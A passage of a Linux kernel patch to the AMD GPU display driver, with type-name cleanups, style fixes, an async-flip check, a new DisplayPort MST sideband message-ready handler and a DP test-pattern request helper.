+@@ -7010,6 +7020,7 @@ void amdgpu_dm_connector_init_helper(struct amdgpu_display_manager *dm,
+ 	aconnector->hpd.hpd = AMDGPU_HPD_NONE; /* not used */
+ 	aconnector->audio_inst = -1;
+ 	mutex_init(&aconnector->hpd_lock);
++	mutex_init(&aconnector->handle_mst_msg_ready);
+ 
+ 	/*
+ 	 * configure support HPD hot plug connector_>polled default value is 0
+@@ -7152,7 +7163,7 @@ create_i2c(struct ddc_service *ddc_service,
+  */
+ static int amdgpu_dm_connector_init(struct amdgpu_display_manager *dm,
+ 				    struct amdgpu_dm_connector *aconnector,
+-				    uint32_t link_index,
++				    u32 link_index,
+ 				    struct amdgpu_encoder *aencoder)
+ {
+ 	int res = 0;
+@@ -7163,7 +7174,6 @@ static int amdgpu_dm_connector_init(struct amdgpu_display_manager *dm,
+ 
+ 	link->priv = aconnector;
+ 
+-	DRM_DEBUG_DRIVER("%s()\n", __func__);
+ 
+ 	i2c = create_i2c(link->ddc, link->link_index, &res);
+ 	if (!i2c) {
+@@ -7643,8 +7653,8 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				    struct drm_crtc *pcrtc,
+ 				    bool wait_for_vblank)
+ {
+-	uint32_t i;
+-	uint64_t timestamp_ns;
++	u32 i;
++	u64 timestamp_ns;
+ 	struct drm_plane *plane;
+ 	struct drm_plane_state *old_plane_state, *new_plane_state;
+ 	struct amdgpu_crtc *acrtc_attach = to_amdgpu_crtc(pcrtc);
+@@ -7655,7 +7665,7 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			to_dm_crtc_state(drm_atomic_get_old_crtc_state(state, pcrtc));
+ 	int planes_count = 0, vpos, hpos;
+ 	unsigned long flags;
+-	uint32_t target_vblank, last_flip_vblank;
++	u32 target_vblank, last_flip_vblank;
+ 	bool vrr_active = amdgpu_dm_vrr_active(acrtc_state);
+ 	bool cursor_update = false;
+ 	bool pflip_present = false;
+@@ -7757,7 +7767,15 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 		 * Only allow immediate flips for fast updates that don't
+ 		 * change memory domain, FB pitch, DCC state, rotation or
+ 		 * mirroring.
++		 *
++		 * dm_crtc_helper_atomic_check() only accepts async flips with
++		 * fast updates.
+ 		 */
++		if (crtc->state->async_flip &&
++		    acrtc_state->update_type != UPDATE_TYPE_FAST)
++			drm_warn_once(state->dev,
++				      "[PLANE:%d:%s] async flip with non-fast update\n",
++				      plane->base.id, plane->name);
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+ 			acrtc_state->update_type == UPDATE_TYPE_FAST &&
+@@ -7800,8 +7818,7 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			 * DRI3/Present extension with defined target_msc.
+ 			 */
+ 			last_flip_vblank = amdgpu_get_vblank_counter_kms(pcrtc);
+-		}
+-		else {
++		} else {
+ 			/* For variable refresh rate mode only:
+ 			 * Get vblank of last completed flip to avoid > 1 vrr
+ 			 * flips per video frame by use of throttling, but allow
+@@ -8096,7 +8113,7 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 	struct amdgpu_display_manager *dm = &adev->dm;
+ 	struct dm_atomic_state *dm_state;
+ 	struct dc_state *dc_state = NULL, *dc_state_temp = NULL;
+-	uint32_t i, j;
++	u32 i, j;
+ 	struct drm_crtc *crtc;
+ 	struct drm_crtc_state *old_crtc_state, *new_crtc_state;
+ 	unsigned long flags;
+@@ -8128,8 +8145,8 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 		dc_resource_state_copy_construct_current(dm->dc, dc_state);
+ 	}
+ 
+-	for_each_oldnew_crtc_in_state (state, crtc, old_crtc_state,
+-				       new_crtc_state, i) {
++	for_each_oldnew_crtc_in_state(state, crtc, old_crtc_state,
++				      new_crtc_state, i) {
+ 		struct amdgpu_crtc *acrtc = to_amdgpu_crtc(crtc);
+ 
+ 		dm_old_crtc_state = to_dm_crtc_state(old_crtc_state);
+@@ -8152,9 +8169,7 @@ static void amdgpu_dm_atomic_commit_tail(struct drm_atomic_state *state)
+ 		dm_old_crtc_state = to_dm_crtc_state(old_crtc_state);
+ 
+ 		drm_dbg_state(state->dev,
+-			"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, "
+-			"planes_changed:%d, mode_changed:%d,active_changed:%d,"
+-			"connectors_changed:%d\n",
++			"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, planes_changed:%d, mode_changed:%d,active_changed:%d,connectors_changed:%d\n",
+ 			acrtc->crtc_id,
+ 			new_crtc_state->enable,
+ 			new_crtc_state->active,
+@@ -8639,8 +8654,8 @@ static int do_aquire_global_lock(struct drm_device *dev,
+ 					&commit->flip_done, 10*HZ);
+ 
+ 		if (ret == 0)
+-			DRM_ERROR("[CRTC:%d:%s] hw_done or flip_done "
+-				  "timed out\n", crtc->base.id, crtc->name);
++			DRM_ERROR("[CRTC:%d:%s] hw_done or flip_done timed out\n",
++				  crtc->base.id, crtc->name);
+ 
+ 		drm_crtc_commit_put(commit);
+ 	}
+@@ -8725,8 +8740,9 @@ is_timing_unchanged_for_freesync(struct drm_crtc_state *old_crtc_state,
+ 	return false;
+ }
+ 
+-static void set_freesync_fixed_config(struct dm_crtc_state *dm_new_crtc_state) {
+-	uint64_t num, den, res;
++static void set_freesync_fixed_config(struct dm_crtc_state *dm_new_crtc_state)
++{
++	u64 num, den, res;
+ 	struct drm_crtc_state *new_crtc_state = &dm_new_crtc_state->base;
+ 
+ 	dm_new_crtc_state->freesync_config.state = VRR_STATE_ACTIVE_FIXED;
+@@ -8848,9 +8864,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		goto skip_modeset;
+ 
+ 	drm_dbg_state(state->dev,
+-		"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, "
+-		"planes_changed:%d, mode_changed:%d,active_changed:%d,"
+-		"connectors_changed:%d\n",
++		"amdgpu_crtc id:%d crtc_state_flags: enable:%d, active:%d, planes_changed:%d, mode_changed:%d,active_changed:%d,connectors_changed:%d\n",
+ 		acrtc->crtc_id,
+ 		new_crtc_state->enable,
+ 		new_crtc_state->active,
+@@ -8879,8 +8893,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 						     old_crtc_state)) {
+ 			new_crtc_state->mode_changed = false;
+ 			DRM_DEBUG_DRIVER(
+-				"Mode change not required for front porch change, "
+-				"setting mode_changed to %d",
++				"Mode change not required for front porch change, setting mode_changed to %d",
+ 				new_crtc_state->mode_changed);
+ 
+ 			set_freesync_fixed_config(dm_new_crtc_state);
+@@ -8892,9 +8905,8 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 			struct drm_display_mode *high_mode;
+ 
+ 			high_mode = get_highest_refresh_rate_mode(aconnector, false);
+-			if (!drm_mode_equal(&new_crtc_state->mode, high_mode)) {
++			if (!drm_mode_equal(&new_crtc_state->mode, high_mode))
+ 				set_freesync_fixed_config(dm_new_crtc_state);
+-			}
+ 		}
+ 
+ 		ret = dm_atomic_get_state(state, &dm_state);
+@@ -9062,6 +9074,7 @@ static bool should_reset_plane(struct drm_atomic_state *state,
+ 	 */
+ 	for_each_oldnew_plane_in_state(state, other, old_other_state, new_other_state, i) {
+ 		struct amdgpu_framebuffer *old_afb, *new_afb;
++
+ 		if (other->type == DRM_PLANE_TYPE_CURSOR)
+ 			continue;
+ 
+@@ -9160,11 +9173,12 @@ static int dm_check_cursor_fb(struct amdgpu_crtc *new_acrtc,
+ 	}
+ 
+ 	/* Core DRM takes care of checking FB modifiers, so we only need to
+-	 * check tiling flags when the FB doesn't have a modifier. */
++	 * check tiling flags when the FB doesn't have a modifier.
++	 */
+ 	if (!(fb->flags & DRM_MODE_FB_MODIFIERS)) {
+ 		if (adev->family < AMDGPU_FAMILY_AI) {
+ 			linear = AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) != DC_ARRAY_2D_TILED_THIN1 &&
+-			         AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) != DC_ARRAY_1D_TILED_THIN1 &&
++				 AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) != DC_ARRAY_1D_TILED_THIN1 &&
+ 				 AMDGPU_TILING_GET(afb->tiling_flags, MICRO_TILE_MODE) == 0;
+ 		} else {
+ 			linear = AMDGPU_TILING_GET(afb->tiling_flags, SWIZZLE_MODE) == 0;
+@@ -9377,12 +9391,12 @@ static int dm_check_crtc_cursor(struct drm_atomic_state *state,
+ 	/* On DCE and DCN there is no dedicated hardware cursor plane. We get a
+ 	 * cursor per pipe but it's going to inherit the scaling and
+ 	 * positioning from the underlying pipe. Check the cursor plane's
+-	 * blending properties match the underlying planes'. */
++	 * blending properties match the underlying planes'.
++	 */
+ 
+ 	new_cursor_state = drm_atomic_get_new_plane_state(state, cursor);
+-	if (!new_cursor_state || !new_cursor_state->fb) {
++	if (!new_cursor_state || !new_cursor_state->fb)
+ 		return 0;
+-	}
+ 
+ 	dm_get_oriented_plane_size(new_cursor_state, &cursor_src_w, &cursor_src_h);
+ 	cursor_scale_w = new_cursor_state->crtc_w * 1000 / cursor_src_w;
+@@ -9428,6 +9442,7 @@ static int add_affected_mst_dsc_crtcs(struct drm_atomic_state *state, struct drm
+ 	struct drm_connector_state *conn_state, *old_conn_state;
+ 	struct amdgpu_dm_connector *aconnector = NULL;
+ 	int i;
++
+ 	for_each_oldnew_connector_in_state(state, connector, old_conn_state, conn_state, i) {
+ 		if (!conn_state->crtc)
+ 			conn_state = old_conn_state;
+@@ -9870,7 +9885,7 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 	}
+ 
+ 	/* Store the overall update type for use later in atomic check. */
+-	for_each_new_crtc_in_state (state, crtc, new_crtc_state, i) {
++	for_each_new_crtc_in_state(state, crtc, new_crtc_state, i) {
+ 		struct dm_crtc_state *dm_new_crtc_state =
+ 			to_dm_crtc_state(new_crtc_state);
+ 
+@@ -9892,7 +9907,7 @@ fail:
+ 	else if (ret == -EINTR || ret == -EAGAIN || ret == -ERESTARTSYS)
+ 		DRM_DEBUG_DRIVER("Atomic check stopped due to signal.\n");
+ 	else
+-		DRM_DEBUG_DRIVER("Atomic check failed with err: %d \n", ret);
++		DRM_DEBUG_DRIVER("Atomic check failed with err: %d\n", ret);
+ 
+ 	trace_amdgpu_dm_atomic_check_finish(state, ret);
+ 
+@@ -9902,7 +9917,7 @@ fail:
+ static bool is_dp_capable_without_timing_msa(struct dc *dc,
+ 					     struct amdgpu_dm_connector *amdgpu_dm_connector)
+ {
+-	uint8_t dpcd_data;
++	u8 dpcd_data;
+ 	bool capable = false;
+ 
+ 	if (amdgpu_dm_connector->dc_link &&
+@@ -9921,7 +9936,7 @@ static bool is_dp_capable_without_timing_msa(struct dc *dc,
+ static bool dm_edid_parser_send_cea(struct amdgpu_display_manager *dm,
+ 		unsigned int offset,
+ 		unsigned int total_length,
+-		uint8_t *data,
++		u8 *data,
+ 		unsigned int length,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb)
+ {
+@@ -9976,7 +9991,7 @@ static bool dm_edid_parser_send_cea(struct amdgpu_display_manager *dm,
+ }
+ 
+ static bool parse_edid_cea_dmcu(struct amdgpu_display_manager *dm,
+-		uint8_t *edid_ext, int len,
++		u8 *edid_ext, int len,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+ 	int i;
+@@ -10017,7 +10032,7 @@ static bool parse_edid_cea_dmcu(struct amdgpu_display_manager *dm,
+ }
+ 
+ static bool parse_edid_cea_dmub(struct amdgpu_display_manager *dm,
+-		uint8_t *edid_ext, int len,
++		u8 *edid_ext, int len,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+ 	int i;
+@@ -10033,7 +10048,7 @@ static bool parse_edid_cea_dmub(struct amdgpu_display_manager *dm,
+ }
+ 
+ static bool parse_edid_cea(struct amdgpu_dm_connector *aconnector,
+-		uint8_t *edid_ext, int len,
++		u8 *edid_ext, int len,
+ 		struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+ 	struct amdgpu_device *adev = drm_to_adev(aconnector->base.dev);
+@@ -10047,7 +10062,7 @@ static bool parse_edid_cea(struct amdgpu_dm_connector *aconnector,
+ static int parse_hdmi_amd_vsdb(struct amdgpu_dm_connector *aconnector,
+ 		struct edid *edid, struct amdgpu_hdmi_vsdb_info *vsdb_info)
+ {
+-	uint8_t *edid_ext = NULL;
++	u8 *edid_ext = NULL;
+ 	int i;
+ 	bool valid_vsdb_found = false;
+ 
+@@ -10223,7 +10238,7 @@ void amdgpu_dm_trigger_timing_sync(struct drm_device *dev)
+ }
+ 
+ void dm_write_reg_func(const struct dc_context *ctx, uint32_t address,
+-		       uint32_t value, const char *func_name)
++		       u32 value, const char *func_name)
+ {
+ #ifdef DM_CHECK_ADDR_0
+ 	if (address == 0) {
+@@ -10238,7 +10253,7 @@ void dm_write_reg_func(const struct dc_context *ctx, uint32_t address,
+ uint32_t dm_read_reg_func(const struct dc_context *ctx, uint32_t address,
+ 			  const char *func_name)
+ {
+-	uint32_t value;
++	u32 value;
+ #ifdef DM_CHECK_ADDR_0
+ 	if (address == 0) {
+ 		DC_ERR("invalid register read; address = 0\n");
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+index ac26e917240b9..2c9a33c80c818 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+@@ -31,6 +31,7 @@
+ #include <drm/drm_connector.h>
+ #include <drm/drm_crtc.h>
+ #include <drm/drm_plane.h>
++#include "link_service_types.h"
+ 
+ /*
+  * This file contains the definition for amdgpu_display_manager
+@@ -192,6 +193,11 @@ struct hpd_rx_irq_offload_work_queue {
+ 	 * we're handling link loss
+ 	 */
+ 	bool is_handling_link_loss;
++	/**
++	 * @is_handling_mst_msg_rdy_event: Used to prevent inserting mst message
++	 * ready event when we're already handling mst message ready event
++	 */
++	bool is_handling_mst_msg_rdy_event;
+ 	/**
+ 	 * @aconnector: The aconnector that this work queue is attached to
+ 	 */
+@@ -613,6 +619,8 @@ struct amdgpu_dm_connector {
+ 	struct drm_dp_mst_port *port;
+ 	struct amdgpu_dm_connector *mst_port;
+ 	struct drm_dp_aux *dsc_aux;
++	struct mutex handle_mst_msg_ready;
++
+ 	/* TODO see if we can merge with ddc_bus or make a dm_connector */
+ 	struct amdgpu_i2c_adapter *i2c;
+ 
+@@ -650,6 +658,10 @@ struct amdgpu_dm_connector {
+ 
+ 	/* Record progress status of mst*/
+ 	uint8_t mst_status;
++
++	/* Automated testing */
++	bool timing_changed;
++	struct dc_crtc_timing *timing_requested;
+ };
+ 
+ static inline void amdgpu_dm_set_mst_status(uint8_t *status,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 1ec643a0d00d2..b9b70f4562c72 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -406,6 +406,18 @@ static int dm_crtc_helper_atomic_check(struct drm_crtc *crtc,
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * Only allow async flips for fast updates that don't change the FB
++	 * pitch, the DCC state, rotation, etc.
++	 */
++	if (crtc_state->async_flip &&
++	    dm_crtc_state->update_type != UPDATE_TYPE_FAST) {
++		drm_dbg_atomic(crtc->dev,
++			       "[CRTC:%d:%s] async flips are only supported for fast updates\n",
++			       crtc->base.id, crtc->name);
++		return -EINVAL;
++	}
++
+ 	/* In some use cases, like reset, no stream is attached */
+ 	if (!dm_crtc_state->stream)
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index db7744beed5fd..9dc41f569a761 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -38,6 +38,9 @@
+ #include "amdgpu_dm.h"
+ #include "amdgpu_dm_irq.h"
+ #include "amdgpu_dm_mst_types.h"
++#include "dpcd_defs.h"
++#include "dc/inc/core_types.h"
++#include "dc_link_dp.h"
+ 
+ #include "dm_helpers.h"
+ #include "ddc_service_types.h"
+@@ -1056,6 +1059,128 @@ void dm_helpers_mst_enable_stream_features(const struct dc_stream_state *stream)
+ 					 sizeof(new_downspread));
+ }
+ 
++bool dm_helpers_dp_handle_test_pattern_request(
++		struct dc_context *ctx,
++		const struct dc_link *link,
++		union link_test_pattern dpcd_test_pattern,
++		union test_misc dpcd_test_params)
++{
++	enum dp_test_pattern test_pattern;
++	enum dp_test_pattern_color_space test_pattern_color_space =
++			DP_TEST_PATTERN_COLOR_SPACE_UNDEFINED;
++	enum dc_color_depth requestColorDepth = COLOR_DEPTH_UNDEFINED;
++	enum dc_pixel_encoding requestPixelEncoding = PIXEL_ENCODING_UNDEFINED;
++	struct pipe_ctx *pipes = link->dc->current_state->res_ctx.pipe_ctx;
++	struct pipe_ctx *pipe_ctx = NULL;
++	struct amdgpu_dm_connector *aconnector = link->priv;
++	int i;
++
++	for (i = 0; i < MAX_PIPES; i++) {
++		if (pipes[i].stream == NULL)
++			continue;
++
++		if (pipes[i].stream->link == link && !pipes[i].top_pipe &&
++			!pipes[i].prev_odm_pipe) {
++			pipe_ctx = &pipes[i];
++			break;
++		}
++	}
++
++	if (pipe_ctx == NULL)
++		return false;
++
++	switch (dpcd_test_pattern.bits.PATTERN) {
++	case LINK_TEST_PATTERN_COLOR_RAMP:
++		test_pattern = DP_TEST_PATTERN_COLOR_RAMP;
++	break;
++	case LINK_TEST_PATTERN_VERTICAL_BARS:
++		test_pattern = DP_TEST_PATTERN_VERTICAL_BARS;
++	break; /* black and white */
++	case LINK_TEST_PATTERN_COLOR_SQUARES:
++		test_pattern = (dpcd_test_params.bits.DYN_RANGE ==
++				TEST_DYN_RANGE_VESA ?
++				DP_TEST_PATTERN_COLOR_SQUARES :
++				DP_TEST_PATTERN_COLOR_SQUARES_CEA);
++	break;
++	default:
++		test_pattern = DP_TEST_PATTERN_VIDEO_MODE;
++	break;
++	}
++
++	if (dpcd_test_params.bits.CLR_FORMAT == 0)
++		test_pattern_color_space = DP_TEST_PATTERN_COLOR_SPACE_RGB;
++	else
++		test_pattern_color_space = dpcd_test_params.bits.YCBCR_COEFS ?
++				DP_TEST_PATTERN_COLOR_SPACE_YCBCR709 :
++				DP_TEST_PATTERN_COLOR_SPACE_YCBCR601;
++
++	switch (dpcd_test_params.bits.BPC) {
++	case 0: // 6 bits
++		requestColorDepth = COLOR_DEPTH_666;
++		break;
++	case 1: // 8 bits
++		requestColorDepth = COLOR_DEPTH_888;
++		break;
++	case 2: // 10 bits
++		requestColorDepth = COLOR_DEPTH_101010;
++		break;
++	case 3: // 12 bits
++		requestColorDepth = COLOR_DEPTH_121212;
++		break;
++	default:
++		break;
++	}
++
++	switch (dpcd_test_params.bits.CLR_FORMAT) {
++	case 0:
++		requestPixelEncoding = PIXEL_ENCODING_RGB;
++		break;
++	case 1:
++		requestPixelEncoding = PIXEL_ENCODING_YCBCR422;
++		break;
++	case 2:
++		requestPixelEncoding = PIXEL_ENCODING_YCBCR444;
++		break;
++	default:
++		requestPixelEncoding = PIXEL_ENCODING_RGB;
++		break;
++	}
++
++	if ((requestColorDepth != COLOR_DEPTH_UNDEFINED
++		&& pipe_ctx->stream->timing.display_color_depth != requestColorDepth)
++		|| (requestPixelEncoding != PIXEL_ENCODING_UNDEFINED
++		&& pipe_ctx->stream->timing.pixel_encoding != requestPixelEncoding)) {
++		DC_LOG_DEBUG("%s: original bpc %d pix encoding %d, changing to %d  %d\n",
++				__func__,
++				pipe_ctx->stream->timing.display_color_depth,
++				pipe_ctx->stream->timing.pixel_encoding,
++				requestColorDepth,
++				requestPixelEncoding);
++		pipe_ctx->stream->timing.display_color_depth = requestColorDepth;
++		pipe_ctx->stream->timing.pixel_encoding = requestPixelEncoding;
++
++		dp_update_dsc_config(pipe_ctx);
++
++		aconnector->timing_changed = true;
++		/* store current timing */
++		if (aconnector->timing_requested)
++			*aconnector->timing_requested = pipe_ctx->stream->timing;
++		else
++			DC_LOG_ERROR("%s: timing storage failed\n", __func__);
++
++	}
++
++	dc_link_dp_set_test_pattern(
++		(struct dc_link *) link,
++		test_pattern,
++		test_pattern_color_space,
++		NULL,
++		NULL,
++		0);
++
++	return false;
++}
++
+ void dm_set_phyd32clk(struct dc_context *ctx, int freq_khz)
+ {
+        // TODO
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index e2f9141d6d938..05708684c9f58 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -590,8 +590,118 @@ dm_dp_add_mst_connector(struct drm_dp_mst_topology_mgr *mgr,
+ 	return connector;
+ }
+ 
++void dm_handle_mst_sideband_msg_ready_event(
++	struct drm_dp_mst_topology_mgr *mgr,
++	enum mst_msg_ready_type msg_rdy_type)
++{
++	uint8_t esi[DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI] = { 0 };
++	uint8_t dret;
++	bool new_irq_handled = false;
++	int dpcd_addr;
++	uint8_t dpcd_bytes_to_read;
++	const uint8_t max_process_count = 30;
++	uint8_t process_count = 0;
++	u8 retry;
++	struct amdgpu_dm_connector *aconnector =
++			container_of(mgr, struct amdgpu_dm_connector, mst_mgr);
++
++
++	const struct dc_link_status *link_status = dc_link_get_status(aconnector->dc_link);
++
++	if (link_status->dpcd_caps->dpcd_rev.raw < 0x12) {
++		dpcd_bytes_to_read = DP_LANE0_1_STATUS - DP_SINK_COUNT;
++		/* DPCD 0x200 - 0x201 for downstream IRQ */
++		dpcd_addr = DP_SINK_COUNT;
++	} else {
++		dpcd_bytes_to_read = DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI;
++		/* DPCD 0x2002 - 0x2005 for downstream IRQ */
++		dpcd_addr = DP_SINK_COUNT_ESI;
++	}
++
++	mutex_lock(&aconnector->handle_mst_msg_ready);
++
++	while (process_count < max_process_count) {
++		u8 ack[DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI] = {};
++
++		process_count++;
++
++		dret = drm_dp_dpcd_read(
++			&aconnector->dm_dp_aux.aux,
++			dpcd_addr,
++			esi,
++			dpcd_bytes_to_read);
++
++		if (dret != dpcd_bytes_to_read) {
++			DRM_DEBUG_KMS("DPCD read and acked number is not as expected!");
++			break;
++		}
++
++		DRM_DEBUG_DRIVER("ESI %02x %02x %02x\n", esi[0], esi[1], esi[2]);
++
++		switch (msg_rdy_type) {
++		case DOWN_REP_MSG_RDY_EVENT:
++			/* Only handle DOWN_REP_MSG_RDY case*/
++			esi[1] &= DP_DOWN_REP_MSG_RDY;
++			break;
++		case UP_REQ_MSG_RDY_EVENT:
++			/* Only handle UP_REQ_MSG_RDY case*/
++			esi[1] &= DP_UP_REQ_MSG_RDY;
++			break;
++		default:
++			/* Handle both cases*/
++			esi[1] &= (DP_DOWN_REP_MSG_RDY | DP_UP_REQ_MSG_RDY);
++			break;
++		}
++
++		if (!esi[1])
++			break;
++
++		/* handle MST irq */
++		if (aconnector->mst_mgr.mst_state)
++			drm_dp_mst_hpd_irq_handle_event(&aconnector->mst_mgr,
++						 esi,
++						 ack,
++						 &new_irq_handled);
++
++		if (new_irq_handled) {
++			/* ACK at DPCD to notify down stream */
++			for (retry = 0; retry < 3; retry++) {
++				ssize_t wret;
++
++				wret = drm_dp_dpcd_writeb(&aconnector->dm_dp_aux.aux,
++							  dpcd_addr + 1,
++							  ack[1]);
++				if (wret == 1)
++					break;
++			}
++
++			if (retry == 3) {
++				DRM_ERROR("Failed to ack MST event.\n");
++				return;
++			}
++
++			drm_dp_mst_hpd_irq_send_new_request(&aconnector->mst_mgr);
++
++			new_irq_handled = false;
++		} else {
++			break;
++		}
++	}
++
++	mutex_unlock(&aconnector->handle_mst_msg_ready);
++
++	if (process_count == max_process_count)
++		DRM_DEBUG_DRIVER("Loop exceeded max iterations\n");
++}
++
++static void dm_handle_mst_down_rep_msg_ready(struct drm_dp_mst_topology_mgr *mgr)
++{
++	dm_handle_mst_sideband_msg_ready_event(mgr, DOWN_REP_MSG_RDY_EVENT);
++}
++
+ static const struct drm_dp_mst_topology_cbs dm_mst_cbs = {
+ 	.add_connector = dm_dp_add_mst_connector,
++	.poll_hpd_irq = dm_handle_mst_down_rep_msg_ready,
+ };
+ 
+ void amdgpu_dm_initialize_dp_connector(struct amdgpu_display_manager *dm,
+@@ -673,15 +783,18 @@ static void set_dsc_configs_from_fairness_vars(struct dsc_mst_fairness_params *p
+ 		int count,
+ 		int k)
+ {
++	struct drm_connector *drm_connector;
+ 	int i;
+ 
+ 	for (i = 0; i < count; i++) {
++		drm_connector = &params[i].aconnector->base;
++
+ 		memset(&params[i].timing->dsc_cfg, 0, sizeof(params[i].timing->dsc_cfg));
+ 		if (vars[i + k].dsc_enabled && dc_dsc_compute_config(
+ 					params[i].sink->ctx->dc->res_pool->dscs[0],
+ 					&params[i].sink->dsc_caps.dsc_dec_caps,
+ 					params[i].sink->ctx->dc->debug.dsc_min_slice_height_override,
+-					params[i].sink->edid_caps.panel_patch.max_dsc_target_bpp_limit,
++					drm_connector->display_info.max_dsc_bpp,
+ 					0,
+ 					params[i].timing,
+ 					&params[i].timing->dsc_cfg)) {
+@@ -723,12 +836,16 @@ static int bpp_x16_from_pbn(struct dsc_mst_fairness_params param, int pbn)
+ 	struct dc_dsc_config dsc_config;
+ 	u64 kbps;
+ 
++	struct drm_connector *drm_connector = &param.aconnector->base;
++	uint32_t max_dsc_target_bpp_limit_override =
++		drm_connector->display_info.max_dsc_bpp;
++
+ 	kbps = div_u64((u64)pbn * 994 * 8 * 54, 64);
+ 	dc_dsc_compute_config(
+ 			param.sink->ctx->dc->res_pool->dscs[0],
+ 			&param.sink->dsc_caps.dsc_dec_caps,
+ 			param.sink->ctx->dc->debug.dsc_min_slice_height_override,
+-			param.sink->edid_caps.panel_patch.max_dsc_target_bpp_limit,
++			max_dsc_target_bpp_limit_override,
+ 			(int) kbps, param.timing, &dsc_config);
+ 
+ 	return dsc_config.bits_per_pixel;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+index 1e4ede1e57abd..37c820ab0fdbc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+@@ -49,6 +49,13 @@
+ #define PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B	1031
+ #define PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B	1000
+ 
++enum mst_msg_ready_type {
++	NONE_MSG_RDY_EVENT = 0,
++	DOWN_REP_MSG_RDY_EVENT = 1,
++	UP_REQ_MSG_RDY_EVENT = 2,
++	DOWN_OR_UP_MSG_RDY_EVENT = 3
++};
++
+ struct amdgpu_display_manager;
+ struct amdgpu_dm_connector;
+ 
+@@ -61,6 +68,10 @@ void amdgpu_dm_initialize_dp_connector(struct amdgpu_display_manager *dm,
+ void
+ dm_dp_create_fake_mst_encoders(struct amdgpu_device *adev);
+ 
++void dm_handle_mst_sideband_msg_ready_event(
++	struct drm_dp_mst_topology_mgr *mgr,
++	enum mst_msg_ready_type msg_rdy_type);
++
+ struct dsc_mst_fairness_vars {
+ 	int pbn;
+ 	bool dsc_enabled;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c
+index c1eaf571407a3..9f593eddb6b71 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_clk_mgr.c
+@@ -86,6 +86,11 @@ static int dcn31_get_active_display_cnt_wa(
+ 				stream->signal == SIGNAL_TYPE_DVI_SINGLE_LINK ||
+ 				stream->signal == SIGNAL_TYPE_DVI_DUAL_LINK)
+ 			tmds_present = true;
++
++		/* Checking stream / link detection ensuring that PHY is active*/
++		if (dc_is_dp_signal(stream->signal) && !stream->dpms_off)
++			display_count++;
++
+ 	}
+ 
+ 	for (i = 0; i < dc->link_count; i++) {
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+index 24f1aba4ae133..82b747c0ed693 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+@@ -3115,7 +3115,7 @@ struct dc_link_settings dp_get_max_link_cap(struct dc_link *link)
+ 	return max_link_cap;
+ }
+ 
+-static enum dc_status read_hpd_rx_irq_data(
++enum dc_status read_hpd_rx_irq_data(
